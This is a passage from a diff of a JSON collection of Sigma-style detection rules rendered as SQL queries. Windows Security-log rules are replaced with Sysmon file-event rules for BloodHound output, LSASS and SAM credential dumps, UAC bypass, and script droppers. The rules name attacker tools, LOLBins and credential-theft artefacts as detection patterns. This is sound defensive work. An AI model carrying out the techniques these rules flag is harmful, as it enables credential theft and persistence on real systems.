'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename 
LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "status": "experimental", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Some false positives may arise in some environment and this may require some tuning. 
Add addional filters or reduce level depending on the level of noise" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": 
"file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - 
"SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" - ], - "filename": "win_security_susp_rottenpotato.yml" - }, - { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "title": "ScreenConnect Temporary Installation Artefact", + "id": "fec96f39-988b-4586-b746-b93d59fd1922", "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Intended inclusions by administrator" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\')" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_screenconnect_artefact.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "title": "Writing Local Admin Share", + "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" ], - "filename": 
"win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_writing_local_admin_share.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", - "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE 
'%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE 
'%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Denied Access To Remote Desktop", - "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "title": "Startup Folder File Write", + "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", "status": "test", - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "author": "Pushkarev Dmitry", + "description": "A General detection for files being 
created in the Windows startup directory. This could be an indicator of persistence.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Valid user was not added to RDP group" + "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" - ], - "filename": "win_security_not_allowed_rdp_access.yml" - }, - { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", - "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", - "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" - ], - "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. 
To avoid false postives, it's better to filter out those events before they reach the SIEM" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_startup_folder_file_write.yml" }, { - "title": "DPAPI Domain Master Key Backup Attempt", - "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." 
+ "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 
'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "SCM Database Handle Failure", - "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects non-system users failing to get a handle of the SCM database.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1010" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Rare cases of administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" ], - "filename": "win_security_scm_database_handle_failure.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "False positives should be very low with the extensions list cited. 
Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - 
"author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects windows executables that writes files with suspicious extensions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 